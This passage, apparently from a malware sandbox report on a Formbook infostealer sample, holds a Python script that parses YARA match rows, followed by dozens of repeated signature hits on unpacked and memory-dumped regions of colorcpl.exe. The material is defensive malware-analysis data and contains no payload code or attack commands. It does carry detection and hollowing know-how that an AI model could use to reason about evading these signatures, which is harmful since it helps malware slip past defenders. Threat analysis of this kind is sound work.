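PMS_RE = re.compile(r"^Process Memory Space:\s*(?P<image>.+?)\s+PID:\s*(?P<pid>\d+)$")
# "key = value, key = value" rule metadata; a value may itself contain ", " (scan_context does).
META_RE = re.compile(r"(\w+)\s*=\s*(.*?)(?=,\s*\w+\s*=|$)")
AUTHOR_RE = re.compile(r"Author:\s*(.+?)\s*$")


def parse_meta(meta: str) -> dict:
    """'k = v, k = v' metadata to a dict; empty for the short 'Author: x' form."""
    return {k: v.strip() for k, v in META_RE.findall(meta)}


def parse_source(source: str) -> dict:
    """Classify the dump name and pull out process, base address and protection where present."""
    m = UNPACK_RE.match(source)
    if m:
        return {"kind": "unpacked_pe", "process": f"proc#{int(m['proc'])} ({m['image']})",
                "base": int(m["base"], 16), "protection": None}
    m = SDMP_RE.match(source)
    if m:
        f = m["fields"].split(".")
        return {"kind": "memory_dump", "process": f"proc#{int(f[0])}",
                "base": int(f[3], 16), "protection": int(f[4], 16)}
    m = PMS_RE.match(source)
    if m:
        return {"kind": "process_strings", "process": f"{m['image']} PID {m['pid']}",
                "base": None, "protection": None}
    return {"kind": "other", "process": source, "base": None, "protection": None}


def parse_match(line: str):
    """Parse one 'Source: ... Matched rule: ...' row; None for any other line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = {"type": m["type"], "rule": m["rule"], "meta": parse_meta(m["meta"])}
    rec.update(parse_source(m["source"]))
    prot = rec["protection"]
    rec["protection_name"] = None if prot is None else PROTECTIONS.get(prot, hex(prot))
    a = AUTHOR_RE.search(m["meta"])
    rec["author"] = rec["meta"].get("author") or (a.group(1) if a else None)
    return rec


def summarize(report_text: str) -> dict:
    """Which rules hit which processes, and which hits sit in executable memory."""
    rows = [r for r in map(parse_match, report_text.splitlines()) if r]
    by_rule = defaultdict(set)
    exec_regions = set()
    for r in rows:
        by_rule[r["rule"]].add(r["process"])
        if r["protection"] is not None and r["protection"] & EXEC_MASK:
            exec_regions.add((r["process"], f"0x{r['base']:08X}"))
    return {
        "matches": len(rows),
        "rules": sorted(by_rule),
        "by_rule": {rule: sorted(procs) for rule, procs in sorted(by_rule.items())},
        "exec_regions": sorted(exec_regions),
    }


# Constructed sample: four rows copied from the report above (the second one kept in the
# fused "MEMORYMatched rule" form that text extraction produces).
SAMPLE = """\
Source: 1.2.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: Process Memory Space: colorcpl.exe PID: 3576, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
"""

if __name__ == "__main__":
    print(json.dumps(summarize(SAMPLE), indent=2))
```

Feeding the full section through `summarize` collapses the several hundred rows into one entry per rule with the hosting processes, and `exec_regions` lists only the RWX regions, which is the list you would carve out of a live memory image for config extraction or for confirming the hollowed host processes named elsewhere in this report.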
Source: 0321423605241625.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: 1.2.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.0.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.0.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.0.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.0.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.colorcpl.exe.10410000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.0.colorcpl.exe.10410000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.0.colorcpl.exe.10410000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.colorcpl.exe.10410000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.0.colorcpl.exe.10410000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.0.colorcpl.exe.10410000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.colorcpl.exe.10410000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.0.colorcpl.exe.10410000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.0.colorcpl.exe.10410000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.colorcpl.exe.10410000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.0.colorcpl.exe.10410000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.0.colorcpl.exe.10410000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.colorcpl.exe.10410000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.0.colorcpl.exe.10410000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.0.colorcpl.exe.10410000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.colorcpl.exe.10410000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.0.colorcpl.exe.10410000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.0.colorcpl.exe.10410000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
